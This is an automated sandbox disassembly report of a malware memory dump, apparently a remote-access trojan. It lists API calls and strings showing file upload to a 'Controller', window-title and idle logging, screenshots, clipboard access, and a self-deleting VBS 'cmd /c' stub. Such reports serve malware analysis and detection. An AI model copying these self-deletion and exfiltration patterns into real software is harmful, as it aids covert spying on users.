                        • Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
                        • Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                        • Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D
                        APIs
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$Info
                        • String ID:
                        • API String ID: 2509303402-0
                        • Opcode ID: 5c7b1bf4f475568e38e69d940d0222fa4f9c7dd3754b5f784b0771feacd0cc66
                        • Instruction ID: 88ee944febda996c7adaaf7605242af7944d99fb061a5fd2e4f26fad8993db39
                        • Opcode Fuzzy Hash: 5c7b1bf4f475568e38e69d940d0222fa4f9c7dd3754b5f784b0771feacd0cc66
                        • Instruction Fuzzy Hash: 75B1CD719006059FEF20DF69C881BEEBBB4FF09304F14412EF5A8A7242D6799D45CB65
                        APIs
                        • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408CE3
                        • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
                        • __aulldiv.LIBCMT ref: 00408D4D
                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                        • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
                        • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
                        • CloseHandle.KERNEL32(00000000), ref: 00408F64
                        • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FAE
                        • CloseHandle.KERNEL32(00000000), ref: 00408FFC
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                        • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                        • API String ID: 3086580692-2582957567
                        • Opcode ID: 63a76c325e571f1cbcae1b5be894793c9b49cb204c16b04160e7bd094f2be9c7
                        • Instruction ID: 4fd1ef8f0950b8c70c5ee12d710945c0a569e6ad21e20d2a74dcf75f3ec9a52d
                        • Opcode Fuzzy Hash: 63a76c325e571f1cbcae1b5be894793c9b49cb204c16b04160e7bd094f2be9c7
                        • Instruction Fuzzy Hash: 95B193716083409BC314FB25C982AAFB7E5AFC4354F50492FF589622D2EF789945CB8B
                        APIs
                        • Sleep.KERNEL32(00001388), ref: 0040A740
                          • Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                          • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                          • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                          • Part of subcall function 0040A675: CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
                        • GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
                        • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
                        • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A81E
                          • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                        • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,00000000,00000000,00000000), ref: 0040A927
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                        • String ID: 8SG$8SG$pQG$pQG$PG$PG
                        • API String ID: 3795512280-1152054767
                        • Opcode ID: f9bf0f70ca639f6d962135a3ade2805c3c6b71e3802994e37fdf4666e5df7246
                        • Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
                        • Opcode Fuzzy Hash: f9bf0f70ca639f6d962135a3ade2805c3c6b71e3802994e37fdf4666e5df7246
                        • Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E
                        APIs
                        • connect.WS2_32(?,?,?), ref: 004048E0
                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                        • WSAGetLastError.WS2_32 ref: 00404A21
                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateEvent$ErrorLastLocalTimeconnect
                        • String ID: Connection Failed: $Connection Refused$PkGNG$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                        • API String ID: 994465650-3229884001
                        • Opcode ID: 544a8dfd755885537e58458bfc18e92728dddd0fb449b18b6c8fe8c32441fe06
                        • Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
                        • Opcode Fuzzy Hash: 544a8dfd755885537e58458bfc18e92728dddd0fb449b18b6c8fe8c32441fe06
                        • Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF
                        APIs
                        • ___free_lconv_mon.LIBCMT ref: 0045130A
                          • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                          • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                          • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
                        • _free.LIBCMT ref: 004512FF
                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                        • _free.LIBCMT ref: 00451321
                        • _free.LIBCMT ref: 00451336
                        • _free.LIBCMT ref: 00451341
                        • _free.LIBCMT ref: 00451363
                        • _free.LIBCMT ref: 00451376
                        • _free.LIBCMT ref: 00451384
                        • _free.LIBCMT ref: 0045138F
                        • _free.LIBCMT ref: 004513C7
                        • _free.LIBCMT ref: 004513CE
                        • _free.LIBCMT ref: 004513EB
                        • _free.LIBCMT ref: 00451403
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                        • String ID:
                        • API String ID: 161543041-0
                        • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                        • Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
                        • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                        • Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59
                        APIs
                        • __EH_prolog.LIBCMT ref: 00419FB9
                        • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419FEB
                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
                        • Sleep.KERNEL32(000003E8), ref: 0041A0FD
                        • GetLocalTime.KERNEL32(?), ref: 0041A105
                        • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                        • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                        • API String ID: 489098229-1431523004
                        • Opcode ID: 794bb2b208bad590467bd00f6a6004f6f957c756b4e279e9b706f936551238fb
                        • Instruction ID: 65e100c03f0dda0ba9a952c873ad8774fe275ee1deca45487f64c7c8a8292b0e
                        • Opcode Fuzzy Hash: 794bb2b208bad590467bd00f6a6004f6f957c756b4e279e9b706f936551238fb
                        • Instruction Fuzzy Hash: E7515D70A00215AACB14BBB5C8529ED7BA9AB44308F40403FF509AB1E2EF7C9D85C799
                        APIs
                          • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                          • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                          • Part of subcall function 004136F8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00413714
                          • Part of subcall function 004136F8: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 0041372D
                          • Part of subcall function 004136F8: RegCloseKey.ADVAPI32(?), ref: 00413738
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
                        • ExitProcess.KERNEL32 ref: 0040D9C4
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                        • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                        • API String ID: 1913171305-3159800282
                        • Opcode ID: 8540ee6109fc5d5e06acd7d4b9875de3834636e3193428be82b889be829a6c91
                        • Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
                        • Opcode Fuzzy Hash: 8540ee6109fc5d5e06acd7d4b9875de3834636e3193428be82b889be829a6c91
                        • Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98
                        APIs
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free
                        • String ID:
                        • API String ID: 269201875-0
                        • Opcode ID: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                        • Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
                        • Opcode Fuzzy Hash: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                        • Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798
                        APIs
                          • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000,?,00455C84,00000000,0000000C), ref: 004558C6
                        • GetLastError.KERNEL32 ref: 00455CEF
                        • __dosmaperr.LIBCMT ref: 00455CF6
                        • GetFileType.KERNEL32(00000000), ref: 00455D02
                        • GetLastError.KERNEL32 ref: 00455D0C
                        • __dosmaperr.LIBCMT ref: 00455D15
                        • CloseHandle.KERNEL32(00000000), ref: 00455D35
                        • CloseHandle.KERNEL32(?), ref: 00455E7F
                        • GetLastError.KERNEL32 ref: 00455EB1
                        • __dosmaperr.LIBCMT ref: 00455EB8
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                        • String ID: H
                        • API String ID: 4237864984-2852464175
                        • Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                        • Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
                        • Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                        • Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59
                        APIs
                        • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453E2F
                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453EB2
                        • __alloca_probe_16.LIBCMT ref: 00453EEA
                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,\@E,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F45
                        • __alloca_probe_16.LIBCMT ref: 00453F94
                        • MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F5C
                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                        • MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FD8
                        • __freea.LIBCMT ref: 00454003
                        • __freea.LIBCMT ref: 0045400F
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                        • String ID: \@E
                        • API String ID: 201697637-1814623452
                        • Opcode ID: 347d6d77569ccb8731e03be0652f4f39992ef0e8e93efb01081f6886d5a4a2b8
                        • Instruction ID: bd5a1837779a5f2dcb5c2ea5aeb828518df7829aba760434011a70bbc407b236
                        • Opcode Fuzzy Hash: 347d6d77569ccb8731e03be0652f4f39992ef0e8e93efb01081f6886d5a4a2b8
                        • Instruction Fuzzy Hash: E391F472E002069ADB209E65CC42AEFBBF59F09756F14052BFC01E7282D739DD89C768
                        APIs
                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,$C,0043EA24,?,?,PkGNG,0044AE9A,00000001,00000001,73E85006), ref: 0044ACA3
                        • __alloca_probe_16.LIBCMT ref: 0044ACDB
                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,PkGNG,0044AE9A,00000001,00000001,73E85006,?,?,?), ref: 0044AD29
                        • __alloca_probe_16.LIBCMT ref: 0044ADC0
                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,73E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
                        • __freea.LIBCMT ref: 0044AE30
                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                        • __freea.LIBCMT ref: 0044AE39
                        • __freea.LIBCMT ref: 0044AE5E
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                        • String ID: $C$PkGNG
                        • API String ID: 3864826663-3740547665
                        • Opcode ID: 362257cb831b64f560ca9c305cbafbf1ddd2a76c4c9bcde51592d12c0f33465e
                        • Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
                        • Opcode Fuzzy Hash: 362257cb831b64f560ca9c305cbafbf1ddd2a76c4c9bcde51592d12c0f33465e
                        • Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free
                        • String ID: \&G$\&G$`&G
                        • API String ID: 269201875-253610517
                        • Opcode ID: bf6a2d62285109b65615641ef8a9ee438ca725d72dbf644c1fcc8e573ee560d0
                        • Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
                        • Opcode Fuzzy Hash: bf6a2d62285109b65615641ef8a9ee438ca725d72dbf644c1fcc8e573ee560d0
                        • Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 65535$udp
                        • API String ID: 0-1267037602
                        • Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                        • Instruction ID: ff24d6befd6f0703c902a6165bd45161ed4db0fb5f75d2635e7e580b9b2721aa
                        • Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                        • Instruction Fuzzy Hash: EF51E7756093019FDB209B58E9057BB37A4AFC4755F08082FF881973A1E76DCCC1865E
                        APIs
                        • __Init_thread_footer.LIBCMT ref: 0040AD38
                        • Sleep.KERNEL32(000001F4), ref: 0040AD43
                        • GetForegroundWindow.USER32 ref: 0040AD49
                        • GetWindowTextLengthW.USER32(00000000), ref: 0040AD52
                        • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040AD86
                        • Sleep.KERNEL32(000003E8), ref: 0040AE54
                          • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                        • String ID: [${ User has been idle for $ minutes }$]
                        • API String ID: 911427763-3954389425
                        • Opcode ID: feb8edceca8c1d3b0438b79f4b5d8782787a457fd28da8b62aac7c6790c891ec
                        • Instruction ID: 3d5ee5432c15115af2c0f1375ae13a0ba8112eb59c463c5c733e63bb31497985
                        • Opcode Fuzzy Hash: feb8edceca8c1d3b0438b79f4b5d8782787a457fd28da8b62aac7c6790c891ec
                        • Instruction Fuzzy Hash: 6D51B1316043419BD314FB21D846AAE7796AB84308F50093FF586A22E2EF7C9D45C69F
                        APIs
                        • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DB9A
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: LongNamePath
                        • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                        • API String ID: 82841172-425784914
                        • Opcode ID: 05c2ad93f6cc2ee26ed5624d475cb04337695bae26b39c69aed6eb4faf56ef7b
                        • Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
                        • Opcode Fuzzy Hash: 05c2ad93f6cc2ee26ed5624d475cb04337695bae26b39c69aed6eb4faf56ef7b
                        • Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F
                        APIs
                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
                        • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
                        • __dosmaperr.LIBCMT ref: 0043A8A6
                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
                        • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
                        • __dosmaperr.LIBCMT ref: 0043A8E3
                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
                        • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
                        • __dosmaperr.LIBCMT ref: 0043A937
                        • _free.LIBCMT ref: 0043A943
                        • _free.LIBCMT ref: 0043A94A
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                        • String ID:
                        • API String ID: 2441525078-0
                        • Opcode ID: 333218d4c374834d2f5605b8d1434d3a456e4a6d1d3d381f1630f1823c8abcb3
                        • Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
                        • Opcode Fuzzy Hash: 333218d4c374834d2f5605b8d1434d3a456e4a6d1d3d381f1630f1823c8abcb3
                        • Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A
                        APIs
                        • SetEvent.KERNEL32(?,?), ref: 004054BF
                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                        • TranslateMessage.USER32(?), ref: 0040557E
                        • DispatchMessageA.USER32(?), ref: 00405589
                        • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                        • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                        • String ID: CloseChat$DisplayMessage$GetMessage
                        • API String ID: 2956720200-749203953
                        • Opcode ID: fef61f91b449ae31e274f9846cb3759d0d19ea8c240772b62dae1734d23b140a
                        • Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
                        • Opcode Fuzzy Hash: fef61f91b449ae31e274f9846cb3759d0d19ea8c240772b62dae1734d23b140a
                        • Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A
                        APIs
                          • Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31
                        • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
                        • CloseHandle.KERNEL32(00000000), ref: 00417DE5
                        • DeleteFileA.KERNEL32(00000000), ref: 00417DF4
                        • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8
                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                        • String ID: 0VG$0VG$<$@$Temp
                        • API String ID: 1704390241-2575729100
                        • Opcode ID: 1c1b3640276c9f2484efac8a9a88c7dcef26998f5c3edd0453bd207f6b4608f6
                        • Instruction ID: cfce1e327495ca125f9f778a73892d1ad62a3a088d665d9de3c725e9e650d499
                        • Opcode Fuzzy Hash: 1c1b3640276c9f2484efac8a9a88c7dcef26998f5c3edd0453bd207f6b4608f6
                        • Instruction Fuzzy Hash: 0E415F319002099BCB14FB62DC56AEE7775AF40318F50417EF506764E1EF7C1A8ACB99
                        APIs
                        • OpenClipboard.USER32 ref: 00416941
                        • EmptyClipboard.USER32 ref: 0041694F
                        • CloseClipboard.USER32 ref: 00416955
                        • OpenClipboard.USER32 ref: 0041695C
                        • GetClipboardData.USER32(0000000D), ref: 0041696C
                        • GlobalLock.KERNEL32(00000000), ref: 00416975
                        • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                        • CloseClipboard.USER32 ref: 00416984
                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                        • String ID: !D@
                        • API String ID: 2172192267-604454484
                        • Opcode ID: 014ab2952fb1720400378532343d04f3ca6c69c69b6d94fb269798378f0b3219
                        • Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
                        • Opcode Fuzzy Hash: 014ab2952fb1720400378532343d04f3ca6c69c69b6d94fb269798378f0b3219
                        • Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69
                        APIs
                        • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
                        • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
                        • GetFileSize.KERNEL32(?,00000000), ref: 00413432
                        • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
                        • CloseHandle.KERNEL32(00000000), ref: 0041345F
                        • CloseHandle.KERNEL32(?), ref: 00413465
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
